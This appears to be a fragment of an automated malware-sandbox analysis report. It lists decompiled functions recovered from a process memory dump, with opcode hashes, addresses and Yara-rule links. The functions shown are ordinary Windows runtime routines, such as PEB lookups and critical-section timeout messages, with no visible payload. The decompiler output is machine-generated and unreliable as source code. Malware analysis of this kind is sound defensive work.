                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction ID: 6fe117ddc7e1db2b8d7944fe9129e698ade9f9f23673964f3d5a2870bc949ba3
                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction Fuzzy Hash: 0CC09B75795440BBDB255F30CD95F157254F741A61F6407587221455F4D56D9C00E508
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05363A1C, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E05363A1C(intOrPtr _a4) {
				void* _t5;

				return L05364620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                      0x05363a35

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction ID: 59fa2edaf89e47968dd38dc5127a33e6f623a292de0c2843fa817e4b4d69956f
                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction Fuzzy Hash: 94C02B33180248BBCB126F41DC00F027F2DE790B60F004020F7040B570C536EC60D58C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05367D50, Relevance: .0, Instructions: 7COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E05367D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                      0x05367d56
                                      0x05367d5b
                                      0x05367d60
                                      0x05367d5d
                                      0x05367d5d
                                      0x05367d5d

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction ID: 17a1d94e9307bc4be1b485ec67d0b16658c6eecddb66b3d86c47a5ba5065f186
                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction Fuzzy Hash: 57B092343019408FDE16DF18C080F2533E4FB44A84B8444D4E400CBA20D229E8008A00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05372ACB, Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E05372ACB() {
				void* _t5;

				return E0535EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                      0x05372adc

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction ID: d155c49d979438e85c1896a2c1663d66cff198f176bb9d483183be57a9809356
                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction Fuzzy Hash: AFB01232D10440CFCF02EF40C610F1D7335FB00760F0544D0940127A30C228AD01EB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E053DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0538CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E053D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E053D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                      0x053dfdda
                                      0x053dfde2
                                      0x053dfde5
                                      0x053dfdec
                                      0x053dfdfa
                                      0x053dfdff
                                      0x053dfe0a
                                      0x053dfe0f
                                      0x053dfe17
                                      0x053dfe1e
                                      0x053dfe19
                                      0x053dfe19
                                      0x053dfe19
                                      0x053dfe20
                                      0x053dfe21
                                      0x053dfe22
                                      0x053dfe25
                                      0x053dfe40

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053DFDFA
                                      Strings
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 053DFE01
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 053DFE2B
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 527820b02391352e0b7a7d37b1b5a5a5007e3d7ccdf91cb0820f9c25f4f5af24
                                      • Instruction ID: d79519a4070d9f17be45d478148b4da128a6caaa32841f9c6a981ce380fc9beb
                                      • Opcode Fuzzy Hash: 527820b02391352e0b7a7d37b1b5a5a5007e3d7ccdf91cb0820f9c25f4f5af24
                                      • Instruction Fuzzy Hash: 44F0F637240201BFD7241A45EC46F23FB6AEB44730F244314F628565E1DA62F92096F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%